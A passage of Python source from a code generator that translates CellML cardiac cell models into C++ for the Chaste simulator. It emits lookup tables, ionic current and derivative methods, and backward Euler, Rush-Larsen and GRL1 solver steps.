self.writeln('mTableMins[', idx, '] = ', min, self.STMT_END)
self.writeln('mTableSteps[', idx, '] = ', step, self.STMT_END)
self.writeln('mTableStepInverses[', idx, '] = ', str(1/float(step)), self.STMT_END)
self.writeln('mTableMaxs[', idx, '] = ', max, self.STMT_END)
self.writeln('mNeedsRegeneration[', idx, '] = true;')
self.writeln('_lookup_table_', idx, self.EQ_ASSIGN, 'NULL', self.STMT_END)
self.writeln(self.lt_class_name, '::RegenerateTables();')
self.close_block()
# Table (re-)generation
self.writeln('void RegenerateTables()')
self.open_block()
event_handler = 'AbstractLookupTableCollection::EventHandler::'
self.writeln(event_handler, 'BeginEvent(', event_handler, 'GENERATE_TABLES);')
if self.config.options.include_dt_in_tables:
self.writeln(self.TYPE_CONST_DOUBLE, self.code_name(self.config.dt_variable), ' = mDt;')
# Hack: avoid unused variable warning
self.writeln('double _unused = ', self.code_name(self.config.dt_variable), ';')
self.writeln('_unused = _unused;\n')
for idx in self.doc.lookup_table_indexes.itervalues():
self.writeln('if (mNeedsRegeneration[', idx, '])')
self.open_block()
self.output_lut_deletion(only_index=idx)
self.output_lut_generation(only_index=idx)
self.writeln('mNeedsRegeneration[', idx, '] = false;')
self.close_block(blank_line=True)
self.writeln(event_handler, 'EndEvent(', event_handler, 'GENERATE_TABLES);')
self.close_block()
# Private data
self.writeln('private:', indent_level=0)
self.writeln('/** The single instance of the class */')
self.writeln('static std::auto_ptr<', self.lt_class_name, '> mpInstance;\n')
if self.row_lookup_method:
self.output_lut_row_lookup_memory()
self.output_lut_declarations()
# Close the class
self.set_indent(0)
self.writeln('};\n')
# Define the instance pointer
self.writeln('std::auto_ptr<', self.lt_class_name, '> ', self.lt_class_name, '::mpInstance;')
self.writeln()
return
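# Outline of the generated singleton (illustrative, assuming one table index
# holding N tables and the class name Model_LookupTables):
#   class Model_LookupTables : public AbstractLookupTableCollection
#   {
#   public:
#       static Model_LookupTables* Instance();
#       void FreeMemory();
#       // per-table _lookup_*/IndexTable*/CheckIndex* methods
#   protected:
#       Model_LookupTables();
#       void RegenerateTables();
#   private:
#       static std::auto_ptr<Model_LookupTables> mpInstance;
#       double (*_lookup_table_0)[N];
#   };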
def output_state_assignments(self, exclude_nonlinear=False,
assign_rY=True,
nodeset=None,
pointer=''):
"""Output statements extracting state variables from their vector.
If exclude_nonlinear is set to true, state variables appearing
in the nonlinear system will not be included.
If nodeset is given, only state variables appearing in nodeset
will be included.
If pointer is given, then the state variables actually appear in the
variable given by pointer, which is of type const std::vector<double>*.
"""
used_vars = set()
for var in self.state_vars:
if ((not exclude_nonlinear or var not in self.nonlinear_system_vars)
and (nodeset is None or var in nodeset)):
used_vars.add(var)
if assign_rY and used_vars:
if pointer:
self.output_comment('For state variable interpolation (SVI) we read in interpolated state variables,')
self.output_comment('otherwise for ionic current interpolation (ICI) we use the state variables of this model (node).')
if self.TYPE_VECTOR_REF == CellMLToChasteTranslator.TYPE_VECTOR_REF:
self.writeln('if (!%s) %s = &rGetStateVariables();' % (pointer, pointer))
self.writeln('const ', self.TYPE_VECTOR_REF, 'rY = *', pointer, self.STMT_END)
else:
self.writeln(self.TYPE_VECTOR_REF, 'rY;')
self.writeln('bool made_new_cvode_vector = false;')
self.writeln('if (!%s)' % (pointer))
self.open_block()
self.writeln('rY = rGetStateVariables();')
self.close_block(False)
self.writeln('else')
self.open_block()
self.writeln('made_new_cvode_vector = true;')
self.writeln('rY = MakeNVector(*%s);' % (pointer))
self.close_block()
else:
self.writeln(self.TYPE_VECTOR_REF, 'rY = rGetStateVariables();')
if self.options.protocol:
low_prop = ('pycml:range-low', NSS['pycml'])
high_prop = ('pycml:range-high', NSS['pycml'])
def check_bound(prop, reln, var, value):
prop_value = var.get_rdf_annotation(prop)
if prop_value:
value = '(%s %s %s ? %s : %s)' % (value, reln, prop_value, prop_value, value)
return value
for i, var in enumerate(self.state_vars):
if var in used_vars:
if self.use_modifiers and var in self.modifier_vars:
value = self.modifier_call(var, self.vector_index('rY', i))
else:
value = self.vector_index('rY', i)
if self.options.protocol:
value = check_bound(low_prop, '<', var, value)
value = check_bound(high_prop, '>', var, value)
#2116 - use supplied fixed voltage if we're clamping
if var is self.v_variable:
value = '(mSetVoltageDerivativeToZero ? this->mFixedVoltage : %s)' % value
self.writeln(self.TYPE_DOUBLE, self.code_name(var),
self.EQ_ASSIGN, value, self.STMT_END)
self.writeln(self.COMMENT_START, 'Units: ', var.units,
'; Initial value: ',
getattr(var, u'initial_value', 'Unknown'))
#621 TODO: maybe convert if state var dimensions include time
self.writeln()
return
def modifier_call(self, var, current_value):
"""Return code for a call to a modifier function for an oxmeta-annotated variable.
The modifier function takes 2 parameters: the current value of the variable,
and the current time. It returns a modified value for the variable.
"""
return ('mp_' + var.oxmeta_name + '_modifier->Calc(' +
current_value + ', ' + self.code_name(self.free_vars[0]) + ')')
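# e.g. modifier_call(var, 'rY[1]') for a variable with oxmeta name
# 'membrane_voltage' returns (time variable name assumed):
#   mp_membrane_voltage_modifier->Calc(rY[1], var_time)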
def vector_index(self, vector, i):
"""Return code for accessing the i'th index of vector."""
return vector + '[' + str(i) + ']'
def vector_create(self, vector, size):
"""Return code for creating a new vector with the given size."""
return ''.join(map(str, [self.TYPE_VECTOR, vector, '(', size, ')', self.STMT_END]))
def vector_initialise(self, vector, size):
"""Return code for creating an already-declared vector with the given size."""
return ''.join(map(str, [vector, '.resize(', size, ')', self.STMT_END]))
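# Examples of the generated snippets (assuming STMT_END is ';'):
#   vector_index('rY', 2)        -> 'rY[2]'
#   vector_create('dqs', 3)      -> 'std::vector<double> dqs(3);'
#   vector_initialise('dqs', 3)  -> 'dqs.resize(3);'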
def output_nonlinear_state_assignments(self, nodeset=None):
"""Output assignments for nonlinear state variables."""
for i, var in enumerate(self.nonlinear_system_vars):
if not nodeset or var in nodeset:
self.writeln(self.TYPE_DOUBLE, self.code_name(var), self.EQ_ASSIGN,
self.vector_index('rCurrentGuess', i), self.STMT_END)
#621 TODO: maybe convert if state var dimensions include time
self.writeln()
return
def get_stimulus_assignment(self):
"""Return code for getting Chaste's stimulus current."""
expr = self.doc._cml_config.i_stim_var
output = self.code_name(expr) + self.EQ_ASSIGN
get_stim = 'GetIntracellularAreaStimulus(' + self.code_name(self.free_vars[0]) + ')'
if self.doc._cml_config.i_stim_negated:
get_stim = '-' + get_stim
return output + get_stim + self.STMT_END
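# Illustrative result (stimulus and time variable names assumed, with
# i_stim_negated False):
#   var_membrane__i_Stim = GetIntracellularAreaStimulus(var_time);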
def output_equations(self, nodeset, zero_stimulus=False):
"""Output the mathematics described by nodeset.
nodeset represents a subset of the assignments in the model.
Output assignments in the order given by a topological sort,
but only include those in nodeset.
"""
# Special case for the stimulus current
if self.doc._cml_config.i_stim_var in nodeset:
if zero_stimulus:
i_stim = self.doc._cml_config.i_stim_var
stim_assignment = self.code_name(i_stim) + self.EQ_ASSIGN + '0.0' + self.STMT_END
else:
stim_assignment = self.get_stimulus_assignment()
for expr in (e for e in self.model.get_assignments() if e in nodeset):
# Special-case the stimulus current
if self.use_chaste_stimulus or zero_stimulus:
if isinstance(expr, cellml_variable) and expr is self.doc._cml_config.i_stim_var:
self.writeln(self.TYPE_CONST_DOUBLE, stim_assignment)
elif not (isinstance(expr, mathml_apply) and
isinstance(expr.operator(), mathml_eq) and
isinstance(expr.eq.lhs, mathml_ci) and
expr.eq.lhs.variable is self.doc._cml_config.i_stim_var):
self.output_assignment(expr)
else:
self.output_assignment(expr)
return
def output_assignment(self, expr):
"""Output an assignment statement.
Has overrides for various special cases.
"""
clear_type = False
writing_data_clamp_current = False
# Figure out what is being assigned to
if isinstance(expr, cellml_variable):
assigned_var = expr
else:
if expr.eq.lhs.localName == 'ci':
assigned_var = expr.eq.lhs.variable
if assigned_var is self.config.i_data_clamp_current:
writing_data_clamp_current = True
self.output_comment('Special handling of data clamp current here (see #2708)')
self.output_comment('(we want to save expense of calling the interpolation method if possible.)')
self.writeln(self.TYPE_DOUBLE, self.code_name(assigned_var), self.EQ_ASSIGN, '0.0' , self.STMT_END)
self.writeln('if (mDataClampIsOn)')
self.open_block()
clear_type = True
else:
assigned_var = None # We don't store derivatives as members
#907: Check if this is the derivative of the transmembrane potential
if not self.use_backward_euler and expr.eq.lhs.diff.dependent_variable == self.v_variable:
clear_type = True
# Parameters don't need assigning
has_modifier = self.use_modifiers and getattr(assigned_var, '_cml_has_modifier', False)
if assigned_var in self.cell_parameters and not has_modifier:
return
# Is the variable declared elsewhere?
if clear_type:
self.TYPE_DOUBLE = self.TYPE_CONST_DOUBLE = ''
elif getattr(assigned_var, '_cml_modifiable', False):
# Override const-ness, e.g. for a lookup table index
self.TYPE_CONST_DOUBLE = self.TYPE_DOUBLE
if (assigned_var and self.use_modifiers and assigned_var in self.modifier_vars
and assigned_var.get_type() != VarTypes.State):
# "Constant" oxmeta-annotated parameters may be modified at run-time
if has_modifier:
# Turn off the modifier to figure out the base value
assigned_var._cml_has_modifier = False
rhs = self.code_name(assigned_var)
assigned_var._cml_has_modifier = True
else:
self.capture_output()
super(CellMLToChasteTranslator, self).output_assignment(expr)
assignment = self.get_captured_output()
eq_pos = assignment.find(self.EQ_ASSIGN)
end_pos = assignment.find(self.STMT_END)
rhs = assignment[eq_pos+len(self.EQ_ASSIGN):end_pos]
if rhs:
# If assigned_var is computed, it'll 'appear' twice - once with expr==assigned_var,
# and once for the assignment mathml_apply. The former will result in an empty rhs.
self.writeln(self.TYPE_CONST_DOUBLE, self.code_name(assigned_var), self.EQ_ASSIGN,
self.modifier_call(assigned_var, rhs), self.STMT_END, nl=False)
self.output_comment(assigned_var.units, indent=False, pad=True)
else:
super(CellMLToChasteTranslator, self).output_assignment(expr)
# if assigned_var:
# # Debug
# self.writeln('EXCEPT_IF_NOT(!std::isinf(', self.code_name(assigned_var), '));')
# self.writeln('EXCEPT_IF_NOT(!std::isnan(', self.code_name(assigned_var), '));')
if clear_type:
# Remove the instance attributes, thus reverting to the class members
del self.TYPE_DOUBLE
del self.TYPE_CONST_DOUBLE
elif getattr(assigned_var, '_cml_modifiable', False):
del self.TYPE_CONST_DOUBLE
if writing_data_clamp_current:
self.close_block(False)
return
def output_mathematics(self):
"""Output the mathematics in this model.
When backward Euler is used, we do so in 5 methods:
* UpdateTransmembranePotential does a forward Euler step for V
* ComputeOneStepExceptVoltage co-ordinates a backward Euler step
* ComputeResidual and ComputeJacobian are used in the Newton iteration
* GetIIonic returns the total ionic current
Rush-Larsen is implemented similarly, with:
* EvaluateEquations evaluates the model derivatives and alpha/beta terms
* ComputeOneStepExceptVoltage does a Rush-Larsen update for eligible variables,
and a forward Euler step for other non-V state variables
Generalised Rush-Larsen methods also have specialised handling; see the
individual methods for details.
For other solvers, only 2 methods are needed:
* EvaluateYDerivatives computes the RHS of the ODE system
* GetIIonic is as above
Where derived-quantity annotations are present, we also generate a
ComputeDerivedQuantities method.
"""
self.output_get_i_ionic()
if self.options.rush_larsen:
self.output_rush_larsen_mathematics()
elif self.use_backward_euler:
self.output_backward_euler_mathematics()
elif self.options.grl1:
self.output_grl1_mathematics()
elif self.options.grl2:
self.output_grl2_mathematics()
else:
self.output_evaluate_y_derivatives()
self.output_derived_quantities()
def calculate_lookup_table_indices(self, nodeset, time_name=None):
"""Output the lookup table index calculations needed for the given equations, if tables are enabled.
If time_name is given, it may be used in exception messages for tables out of bounds.
Note that it needs to be passed in, since GetIIonic does not know the time.
Returns the subset of nodeset used in calculating the indices.
"""
if self.use_lookup_tables:
nodes_used = self.output_table_index_generation(time_name, nodeset=nodeset)
else:
nodes_used = set()
return nodes_used
def output_get_i_ionic(self):
"""Output the GetIIonic method."""
use_modifiers = self.use_modifiers
self.use_modifiers = False
self.output_method_start('GetIIonic', ['const std::vector<double>* pStateVariables'],
self.TYPE_DOUBLE, access='public', defaults=['NULL'])
self.open_block()
# Output mathematics to calculate ionic current, using solver_info.ionic_current.
if (hasattr(self.model, u'solver_info') and hasattr(self.model.solver_info, u'ionic_current')):
if not hasattr(self.model.solver_info.ionic_current, u'var'):
raise ValueError('No ionic currents found; check your configuration file')
nodes = map(lambda elt: self.varobj(unicode(elt)),
self.model.solver_info.ionic_current.var)
# GetIIonic must not include the stimulus current
i_stim = self.doc._cml_config.i_stim_var
nodeset = self.calculate_extended_dependencies(nodes, prune_deps=[i_stim])
#print map(lambda v: v.fullname(), nodes)
#print filter(lambda p: p[2]>0, map(debugexpr, nodeset))
# Output main part of maths
self.output_state_assignments(nodeset=nodeset, pointer='pStateVariables')
table_index_nodes_used = self.calculate_lookup_table_indices(nodeset)
self.output_equations(nodeset - table_index_nodes_used, zero_stimulus=True)
self.writeln()
# Assign the total current to a temporary so we can check for NaN
self.writeln(self.TYPE_CONST_DOUBLE, 'i_ionic', self.EQ_ASSIGN, nl=False)
if self.doc._cml_config.i_ionic_negated:
self.writeln('-(', nl=False, indent=False)
plus = False
for varelt in self.model.solver_info.ionic_current.var:
if plus: self.write('+')
else: plus = True
self.output_variable(varelt)
if self.doc._cml_config.i_ionic_negated:
self.writeln(')', nl=False, indent=False)
self.writeln(self.STMT_END, indent=False)
if self.TYPE_VECTOR_REF == CellMLToCvodeTranslator.TYPE_VECTOR_REF:
self.writeln('if (made_new_cvode_vector)')
self.open_block()
self.writeln('DeleteVector(rY);')
self.close_block(False)
self.writeln('EXCEPT_IF_NOT(!std::isnan(i_ionic));')
self.writeln('return i_ionic', self.STMT_END)
else:
self.writeln('return 0.0;')
self.close_block()
self.use_modifiers = use_modifiers
def output_evaluate_y_derivatives(self, method_name='EvaluateYDerivatives'):
"""Output the EvaluateYDerivatives method."""
# Start code output
self.output_method_start(method_name,
[self.TYPE_DOUBLE + self.code_name(self.free_vars[0]),
'const ' + self.TYPE_VECTOR_REF + 'rY',
self.TYPE_VECTOR_REF + 'rDY'],
'void', access='public')
self.open_block()
if not self.state_vars:
# This isn't an ODE model!
self.close_block()
return
self.output_comment('Inputs:')
self.output_comment('Time units: ', self.free_vars[0].units)
self.output_derivative_calculations(self.state_vars)
# Assign to derivatives vector
for i, var in enumerate(self.state_vars):
self.writeln(self.vector_index('rDY', i), self.EQ_ASSIGN, self.code_name(var, True), self.STMT_END)
self.close_block()
def output_derivative_calculations(self, state_vars, assign_rY=False, extra_nodes=set(),
extra_table_nodes=set()):
"""
This is used by self.output_evaluate_y_derivatives and self.output_rush_larsen_mathematics
to compute the derivatives (and any extra nodes, if given). It contains the special logic
to obey the mSetVoltageDerivativeToZero member variable in the generated code.
Returns a nodeset containing the equations output.
"""
# Work out what equations are needed to compute the derivatives
derivs = set(map(lambda v: (v, self.free_vars[0]), state_vars))
if self.v_variable in state_vars:
dvdt = (self.v_variable, self.free_vars[0])
derivs.remove(dvdt) #907: Consider dV/dt separately
else:
dvdt = None
if self.use_chaste_stimulus:
i_stim = [self.doc._cml_config.i_stim_var]
else:
i_stim = []
nonv_nodeset = self.calculate_extended_dependencies(derivs|extra_nodes, prune_deps=i_stim)
if dvdt:
if self.use_data_clamp:
prune = set([self.config.i_data_clamp_data]) | nonv_nodeset
else:
prune = nonv_nodeset
v_nodeset = self.calculate_extended_dependencies([dvdt], prune=prune, prune_deps=i_stim)
else:
v_nodeset = set()
# State variable inputs
all_nodes = nonv_nodeset|v_nodeset
self.output_state_assignments(assign_rY=assign_rY, nodeset=all_nodes)
self.writeln()
table_index_nodes_used = self.calculate_lookup_table_indices(all_nodes|extra_table_nodes, self.code_name(self.free_vars[0]))
self.output_comment('Mathematics')
#907: Declare dV/dt
if dvdt:
self.writeln(self.TYPE_DOUBLE, self.code_name(self.v_variable, ode=True), self.STMT_END)
# Output mathematics required for non-dV/dt derivatives (which may include dV/dt)
self.output_equations(nonv_nodeset - table_index_nodes_used)
self.writeln()
#907: Calculation of dV/dt
if dvdt:
self.writeln('if (mSetVoltageDerivativeToZero)')
self.open_block()
self.writeln(self.code_name(self.v_variable, ode=True), self.EQ_ASSIGN, '0.0', self.STMT_END)
self.close_block(blank_line=False)
self.writeln('else')
self.open_block()
self.output_equations(v_nodeset - table_index_nodes_used)
self.close_block()
return all_nodes | table_index_nodes_used
def output_backward_euler_mathematics(self):
"""Output the mathematics methods used in a backward Euler cell.
Outputs ComputeResidual, ComputeJacobian,
UpdateTransmembranePotential and ComputeOneStepExceptVoltage.
"""
dt_name = 'mDt'
#model_dt = self.varobj(self.model.solver_info.dt)
if self.nonlinear_system_size > 0:
# Residual
##########
argsize = '[' + str(self.nonlinear_system_size) + ']'
self.output_method_start('ComputeResidual',
[self.TYPE_DOUBLE + self.code_name(self.free_vars[0]),
self.TYPE_CONST_DOUBLE + 'rCurrentGuess' + argsize,
self.TYPE_DOUBLE + 'rResidual' + argsize],
'void', access='public')
self.open_block()
# Output mathematics for computing du/dt for each nonlinear state var u
nodes = map(lambda u: (u, self.free_vars[0]), self.nonlinear_system_vars)
nodeset = self.calculate_extended_dependencies(nodes, prune_deps=[self.doc._cml_config.i_stim_var])
self.output_state_assignments(exclude_nonlinear=True, nodeset=nodeset)
self.output_nonlinear_state_assignments(nodeset=nodeset)
table_index_nodes_used = self.calculate_lookup_table_indices(nodeset, self.code_name(self.free_vars[0]))
self.output_equations(nodeset - table_index_nodes_used)
self.writeln()
# Fill in residual
for i, var in enumerate(self.state_vars):
try:
j = self.nonlinear_system_vars.index(var)
except ValueError:
j = -1
if j != -1:
self.writeln('rResidual[', j, '] = rCurrentGuess[', j, '] - rY[', i, '] - ',
dt_name, '*', self.code_name(var, ode=True), self.STMT_END)
self.close_block()
# Jacobian
##########
self.output_method_start('ComputeJacobian',
[self.TYPE_DOUBLE + self.code_name(self.free_vars[0]),
self.TYPE_CONST_DOUBLE + 'rCurrentGuess' + argsize,
self.TYPE_DOUBLE + 'rJacobian' + argsize + argsize],
'void', access='public')
self.open_block()
# Mathematics that the Jacobian depends on
used_vars = set()
for entry in self.model.solver_info.jacobian.entry:
used_vars.update(self._vars_in(entry.math))
nodeset = self.calculate_extended_dependencies(used_vars, prune_deps=[self.doc._cml_config.i_stim_var])
self.output_state_assignments(exclude_nonlinear=True, nodeset=nodeset)
self.output_nonlinear_state_assignments(nodeset=nodeset)
self.writeln(self.TYPE_CONST_DOUBLE, self.code_name(self.config.dt_variable), self.EQ_ASSIGN, dt_name, self.STMT_END, '\n')
table_index_nodes_used = self.calculate_lookup_table_indices(nodeset|set(map(lambda e: e.math, self.model.solver_info.jacobian.entry)), self.code_name(self.free_vars[0]))
self.output_equations(nodeset - table_index_nodes_used)
self.writeln()
# Jacobian entries
for entry in self.model.solver_info.jacobian.entry:
var_i, var_j = entry.var_i, entry.var_j
i = self.nonlinear_system_vars.index(self.varobj(var_i))
j = self.nonlinear_system_vars.index(self.varobj(var_j))
self.writeln('rJacobian[', i, '][', j, '] = ', nl=False)
entry_content = list(entry.math.xml_element_children())
assert len(entry_content) == 1, "Malformed Jacobian matrix entry: " + entry.xml()
self.output_expr(entry_content[0], False)
self.writeln(self.STMT_END, indent=False)
# self.output_comment('Debugging')
# self.writeln('#ifndef NDEBUG', indent=False)
# self.writeln('for (unsigned i=0; i<', len(self.nonlinear_system_vars), '; i++)')
# self.writeln('for (unsigned j=0; j<', len(self.nonlinear_system_vars), '; j++)', indent_offset=1)
# self.writeln('EXCEPT_IF_NOT(!std::isnan(rJacobian[i][j]));', indent_offset=2)
# self.writeln('//DumpJacobianToFile(', self.code_name(self.free_vars[0]),
# ', rCurrentGuess, rJacobian, rY);')
# self.writeln('#endif // NDEBUG', indent=False)
self.close_block()
# The other methods are protected
self.writeln_hpp('protected:', indent_offset=-1)
# UpdateTransmembranePotential
##############################
self.output_method_start('UpdateTransmembranePotential',
[self.TYPE_DOUBLE + self.code_name(self.free_vars[0])],
'void', access='public')
self.open_block()
self.output_comment('Time units: ', self.free_vars[0].units)
# Output mathematics to compute dV/dt
nodes = [(self.state_vars[self.v_index], self.free_vars[0])]
nodeset = self.calculate_extended_dependencies(nodes, prune_deps=[self.doc._cml_config.i_stim_var])
self.output_state_assignments(nodeset=nodeset)
table_index_nodes_used = self.calculate_lookup_table_indices(nodeset, self.code_name(self.free_vars[0]))
self.output_equations(nodeset - table_index_nodes_used)
# Update V
self.writeln()
self.writeln('rY[', self.v_index, '] += ', dt_name, '*',
self.code_name(self.state_vars[self.v_index], ode=True), self.STMT_END)
self.close_block()
# ComputeOneStepExceptVoltage
#############################
self.output_method_start('ComputeOneStepExceptVoltage',
[self.TYPE_DOUBLE + self.code_name(self.free_vars[0])],
'void', access='public')
self.open_block()
self.writeln(self.COMMENT_START, 'Time units: ',
self.free_vars[0].units)
# Output mathematics to update linear state variables, using solver_info.linear_odes.
# Also need to use output_equations for variables used in the update equations.
linear_vars, update_eqns = [], {}
        used_vars = set() # NB: Also contains the update equation if it is a mathml_apply, so that table index generation works
for u, t, update_eqn in SolverInfo(self.model).get_linearised_odes():
assert t == self.free_vars[0]
assert len(update_eqn) == 1
update_eqn = update_eqn[0]
linear_vars.append(u)
update_eqns[id(u)] = update_eqn
if not isinstance(update_eqn, mathml_cn): used_vars.add(update_eqn)
used_vars.update(self._vars_in(update_eqn))
# Output required equations for used variables
nodeset = self.calculate_extended_dependencies(used_vars, prune_deps=[self.doc._cml_config.i_stim_var])
self.output_state_assignments(nodeset=nodeset)
if self.config.dt_variable in nodeset:
self.writeln(self.TYPE_CONST_DOUBLE, self.code_name(self.config.dt_variable), self.EQ_ASSIGN,
dt_name, self.STMT_END, '\n')
table_index_nodes_used = self.calculate_lookup_table_indices(nodeset, self.code_name(self.free_vars[0]))
self.output_equations(nodeset - table_index_nodes_used)
# Update state variables:
# rY[i] = (rY[i] + _g_j*dt) / (1 - _h_j*dt)
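        # (This is the backward Euler solution of the linearised ODE
        #  du/dt = _g_j + _h_j*u over one step: u_new = u_old + dt*(_g_j + _h_j*u_new)
        #  rearranges to the expression above.)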
self.writeln()
linear_vars.sort(key=lambda v: v.fullname())
for i, u in enumerate(linear_vars):
j = self.state_vars.index(u)
self.writeln('rY[', j, ']', self.EQ_ASSIGN, nl=False)
self.output_expr(update_eqns[id(u)], False)
self.writeln(self.STMT_END, indent=False)
# Set up the Newton iteration, if needed
self.writeln()
if self.nonlinear_system_size > 0:
self.writeln('double _guess[', self.nonlinear_system_size, '] = {', nl=False)
comma = False
idx_map = [0] * self.nonlinear_system_size
for i, var in enumerate(self.state_vars):
try:
j = self.nonlinear_system_vars.index(var)
idx_map[j] = i
except ValueError:
pass
for i in idx_map:
if comma: self.write(',')
else: comma = True
self.write('rY[', i, ']')
self.writeln('};', indent=False)
# Solve
CNS = 'CardiacNewtonSolver<%d,%s>' % (self.nonlinear_system_size, self.class_name)
self.writeln(CNS, '* _p_solver = ', CNS, '::Instance();')
self.writeln('_p_solver->Solve(*this, ', self.code_name(self.free_vars[0]), ', _guess);')
# Update state
for j, i in enumerate(idx_map):
self.writeln('rY[', i, '] = _guess[', j, '];')
self.close_block()
def output_rush_larsen_mathematics(self):
"""Output the special methods needed for Rush-Larsen style cell models.
We generate:
        * EvaluateEquations evaluates the model derivatives and alpha/beta terms
* ComputeOneStepExceptVoltage does a Rush-Larsen update for eligible variables,
and a forward Euler step for other non-V state variables
"""
rl_vars = self.doc._cml_rush_larsen
# EvaluateEquations
###################
self.output_method_start('EvaluateEquations',
[self.TYPE_DOUBLE + self.code_name(self.free_vars[0]),
'std::vector<double> &rDY',
'std::vector<double> &rAlphaOrTau',
'std::vector<double> &rBetaOrInf'],
'void', access='public')
self.open_block()
        normal_vars = [v for v in self.state_vars if v not in rl_vars]
nodes, table_nodes = set(), set()
for _, alpha_or_tau, beta_or_inf, _ in rl_vars.itervalues():
table_nodes.add(alpha_or_tau)
nodes.update(self._vars_in(alpha_or_tau))
table_nodes.add(beta_or_inf)
nodes.update(self._vars_in(beta_or_inf))
self.output_derivative_calculations(normal_vars, True, nodes, table_nodes)
# Now assign input vectors
for i, var in enumerate(self.state_vars):
if var in rl_vars:
# Fill in rAlphaOrTau & rBetaOrInf
self.writeln(self.vector_index('rAlphaOrTau', i), self.EQ_ASSIGN, nl=False)
self.output_expr(rl_vars[var][1], False)
self.writeln(self.STMT_END, indent=False)
self.writeln(self.vector_index('rBetaOrInf', i), self.EQ_ASSIGN, nl=False)
self.output_expr(rl_vars[var][2], False)
self.writeln(self.STMT_END, indent=False)
else:
# Fill in rDY
self.writeln(self.vector_index('rDY', i), self.EQ_ASSIGN, self.code_name(var, True), self.STMT_END)
self.close_block()
# ComputeOneStepExceptVoltage
#############################
self.output_method_start('ComputeOneStepExceptVoltage',
['const std::vector<double> &rDY',
'const std::vector<double> &rAlphaOrTau',
'const std::vector<double> &rBetaOrInf'],
'void', access='public')
self.open_block()
self.writeln('std::vector<double>& rY = rGetStateVariables();')
for i, var in enumerate(self.state_vars):
if var in rl_vars:
# Rush-Larsen update
conv = rl_vars[var][3] or ''
if conv: conv = '*' + str(conv)
if rl_vars[var][0] == 'ab':
# Alpha & beta formulation
self.open_block()
self.writeln(self.TYPE_CONST_DOUBLE, 'tau_inv = rAlphaOrTau[', i, '] + rBetaOrInf[', i, '];')
self.writeln(self.TYPE_CONST_DOUBLE, 'y_inf = rAlphaOrTau[', i, '] / tau_inv;')
self.writeln('rY[', i, '] = y_inf + (rY[', i, '] - y_inf)*exp(-mDt', conv, '*tau_inv);')
self.close_block(blank_line=False)
else:
# Tau & inf formulation
self.writeln('rY[', i, '] = rBetaOrInf[', i, '] + (rY[', i, '] - rBetaOrInf[', i, '])',
'*exp(-mDt', conv, '/rAlphaOrTau[', i, ']);')
elif var is not self.v_variable:
# Forward Euler update
self.writeln('rY[', i, '] += mDt * rDY[', i, '];')
self.close_block()
#Megan E. Marsh, Raymond J. Spiteri
#Numerical Simulation Laboratory
#University of Saskatchewan
#December 2011
#Partial support provided by research grants from
#the National Science and Engineering Research
#Council (NSERC) of Canada and the MITACS/Mprime
#Canadian Network of Centres of Excellence.
def output_derivative_calculations_grl(self, var, assign_rY=False, extra_nodes=set(), extra_table_nodes=set()):
"""This is used by self.output_grl?_mathematics to get equations for each variable separately.
Returns a node set with the equations output.
"""
# Work out what equations are needed to compute the derivative of var
if var in self.state_vars:
dvardt = (var, self.free_vars[0])
var_nodeset = self.calculate_extended_dependencies([dvardt])
else:
var_nodeset = set()
# State variable inputs
self.output_state_assignments(nodeset=var_nodeset, assign_rY=assign_rY)
self.writeln()
table_index_nodes_used = self.calculate_lookup_table_indices(var_nodeset, self.code_name(self.free_vars[0]))
self.output_comment('Mathematics')
self.output_equations(var_nodeset - table_index_nodes_used)
return var_nodeset | table_index_nodes_used
def find_grl_partial_derivatives(self):
"""If we have analytic Jacobian information available from Maple, find the terms needed for GRL methods.
This caches where the diagonal entries are in the matrix, indexed by the state variable objects currently in use,
since the entries in the matrix may reference non-partially-evaluated variables.
"""
if not hasattr(self, 'jacobian_diagonal'):
self.jacobian_diagonal = {}
if self.use_analytic_jacobian and not self.jacobian_diagonal:
for entry in self.model.solver_info.jacobian.entry:
if entry.var_i == entry.var_j:
# It's a diagonal entry
var = self.varobj(entry.var_i).get_source_variable(recurse=True)
assert var in self.state_vars, "Jacobian diagonal entry is not in the state vector: " + entry.xml()
entry_content = list(entry.math.xml_element_children())
assert len(entry_content) == 1, "Malformed Jacobian entry: " + entry.xml()
self.jacobian_diagonal[var] = entry_content[0]
def output_grl_compute_partial(self, i, var):
"""Compute the partial derivative of f(var) wrt var, the i'th variable in the state vector.
This uses an analytic Jacobian if available; otherwise it approximates using finite differences.
"""
self.output_method_start('EvaluatePartialDerivative'+str(i),
[self.TYPE_DOUBLE + self.code_name(self.free_vars[0]),
'std::vector<double>& rY', 'double delta', 'bool forceNumerical'],
'double', access='public', defaults=['', '', '', 'false'])
self.open_block()
self.writeln('double partialF;')
if self.jacobian_diagonal:
# Work out what equations are needed to compute the analytic derivative
self.writeln('if (!forceNumerical && this->mUseAnalyticJacobian)')
self.open_block()
entry = self.jacobian_diagonal[var]
nodeset = self.calculate_extended_dependencies(self._vars_in(entry))
self.output_state_assignments(nodeset=nodeset, assign_rY=False)
table_index_nodes_used = self.calculate_lookup_table_indices(nodeset|set([entry]), self.code_name(self.free_vars[0]))
self.output_equations(nodeset)
# Calculate the derivative
self.writeln('partialF = ', nl=False)
self.output_expr(entry, paren=False)
self.writeln(self.STMT_END, indent=False)
self.close_block(blank_line=False)
self.writeln('else')
self.open_block()
# Numerical approximation
self.writeln('const double y_save = rY[', i, '];')
self.writeln('rY[', i, '] += delta;')
self.writeln('const double temp = EvaluateYDerivative', i, '(', self.code_name(self.free_vars[0]), ', rY);')
self.writeln('partialF = (temp-mEvalF[', i, '])/delta;')
self.writeln('rY[', i, '] = y_save;')
if self.jacobian_diagonal:
self.close_block(blank_line=False)
self.writeln('return partialF;')
self.close_block()
#Megan E. Marsh, Raymond J. Spiteri
#Numerical Simulation Laboratory
#University of Saskatchewan
#December 2011
#Partial support provided by research grants from
#the National Science and Engineering Research
#Council (NSERC) of Canada and the MITACS/Mprime
#Canadian Network of Centres of Excellence.
def output_grl1_mathematics(self):
"""Output the special methods needed for GRL1 style cell models.
We generate:
        * UpdateTransmembranePotential updates V_m
* ComputeOneStepExceptVoltage does a GRL1 update for variables except voltage
* EvaluateYDerivativeI for each variable I
"""
self.find_grl_partial_derivatives()
        # UpdateTransmembranePotential
        ##############################
self.output_method_start('UpdateTransmembranePotential',
[self.TYPE_DOUBLE + self.code_name(self.free_vars[0])],
'void', access='public')
self.open_block()
self.writeln('std::vector<double>& rY = rGetStateVariables();')
self.writeln('unsigned v_index = GetVoltageIndex();')
self.writeln('const double delta = 1e-8;')
self.writeln()
# Compute partial derivative of dV wrt V
self.writeln(self.TYPE_DOUBLE, self.code_name(self.v_variable, ode=True), self.STMT_END)
